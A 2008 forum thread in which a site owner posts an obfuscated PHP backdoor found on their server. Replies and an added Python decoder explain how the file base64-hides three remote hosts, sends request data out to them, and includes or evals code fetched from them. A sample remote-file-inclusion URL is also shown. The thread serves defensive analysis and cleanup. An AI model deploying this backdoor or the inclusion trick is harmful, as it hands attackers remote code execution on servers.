Suchy Posted May 22, 2008

I found this in a file (174584.php) on my server in a folder that is set to 777; most likely it is some kind of attack. Can you guys help me decode it? What does this attack do and how does it work?

```php
<?
error_reporting(0);
$s = "e";
// Collect request details, falling back to the old register_globals names
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Base64-encode every collected value and join them into one dotted string
// that is sent to the remote host as the query string
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." .
       base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." .
       base64_encode($g) . "." . base64_encode($h) . ".$s." . base64_encode($i) . "." .
       base64_encode($j);
// Try to include a remote script from the first host, then from the second;
// if both fail, fetch code from a third host and eval() it. Decoded literals:
//   "aHR0cDovLw=="                     -> "http://"
//   "YS5yc2RjcmFmdC53cw=="             -> "a.rsdcraft.ws"
//   "YWQucnVud2ViLmluZm8="             -> "ad.runweb.info"
//   "aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=" -> "http://7.xmldata.info/?"
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("YS5yc2RjcmFmdC53cw==") . "/?" . $str)));
else if (include(base64_decode("aHR0cDovLw==") . base64_decode("YWQucnVud2ViLmluZm8=") . "/?" . $str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=") . $str));
?>
```
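As an added triage example (not part of the thread), a small Python script that decodes every `base64_decode("...")` literal in a PHP file and lists which `eval`/`include`/`file_get_contents` calls end up taking code from a remote URL once the obfuscation is removed. The sample input is a constructed, trimmed copy of the tail of the posted file; the helper names are my own.

```python
import base64
import re

# Constructed sample: the remote-include/eval tail of the posted 174584.php,
# with its base64_decode("...") literals kept verbatim from the post.
SAMPLE_PHP = r'''<? error_reporting(0);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>'''

B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
CONCAT = re.compile(r'"\s*\.\s*"')  # "a"."b" -> "ab"
SINK = re.compile(r'\b(eval|include_once|include|require_once|require|file_get_contents)\s*\(')
URL = re.compile(r'"(https?://[^"]*)"')


def decode_literals(src):
    """Return (encoded, decoded) pairs for every base64_decode("...") in src."""
    pairs = []
    for m in B64_CALL.finditer(src):
        raw = base64.b64decode(m.group(1), validate=True)
        pairs.append((m.group(1), raw.decode("utf-8", "replace")))
    return pairs


def deobfuscate(src):
    """Inline each base64_decode("...") as a plain PHP string literal and
    merge adjacent literal concatenations so the URLs become readable."""
    decoded = B64_CALL.sub(
        lambda m: '"' + base64.b64decode(m.group(1)).decode("utf-8", "replace") + '"', src)
    return CONCAT.sub("", decoded)


def triage(src):
    """List (line_no, sink, url) for every code-loading sink whose argument,
    after decoding, carries a remote URL."""
    findings = []
    for n, line in enumerate(deobfuscate(src).splitlines(), 1):
        for sink in SINK.finditer(line):
            url = URL.search(line, sink.end())
            if url:
                findings.append((n, sink.group(1), url.group(1)))
    return findings


if __name__ == "__main__":
    for enc, dec in decode_literals(SAMPLE_PHP):
        print(f"{enc:40} -> {dec}")
    for n, sink, url in triage(SAMPLE_PHP):
        print(f"line {n}: {sink}() loads code from {url}")
```

Point it at the full file to see the same three hosts; any sink that resolves to a URL you do not own is the part to treat as a backdoor.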
phpretard Posted May 22, 2008

Another FTP attack: your computer is compromised by malware, your FTP password was stolen, and this backdoor was uploaded to the server. Check your computer.
littledragon Posted May 22, 2008

`include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=") ...` is attempting to include an external file. This is usually done by saving a PHP file on their own server with the extension .gif, so that it gets served out as-is, and including it from your server. All this `base64_decode` is trying to hide the address of their server from you.

I have some experience of this... you need to change ALL your passwords, including those for any other users on your server. Even once you've done that, check all your scripts for security vulnerabilities, since people may have been snooping your source code and could take advantage of it. Make sure no files include `$include` where it is set by `$include = $_GET['section']`, since this can easily be attacked (yoursite.com?section=http://theirsite.com/dodgyinclude.gif), make sure register_globals is off, and keep a close eye on things for a while.

I was got by a keylogger in an internet cafe in Brazil (I guess, since the attacks I got afterward were in Portuguese).
littledragon Posted May 22, 2008

And oh yes, check your own computer too.
Suchy (Author) Posted May 22, 2008

How can I check it? They won't let me inside the server farm. Anyway, I changed passwords and deleted the file; what else should I watch out for?

PS. Thanks for the helpful responses.
mlin Posted May 22, 2008

"Check your computer" means run virus/malware scans to try to get rid of anything you don't want. Advanced users don't usually think they know what an infected system looks like (zero-day exploits, etc.), but if you know what a clean system should look like, you can catch most garbage manually using HijackThis (ask Google).

Or, you could abandon winblows for a better platform: Debian, Ubuntu, and gNewSense all rock. All free of fee, but gNewSense is completely free as in speech. Have a look around. They're all also easy to dual boot, so that you can dev on a *nix system and still have winblows there for your games.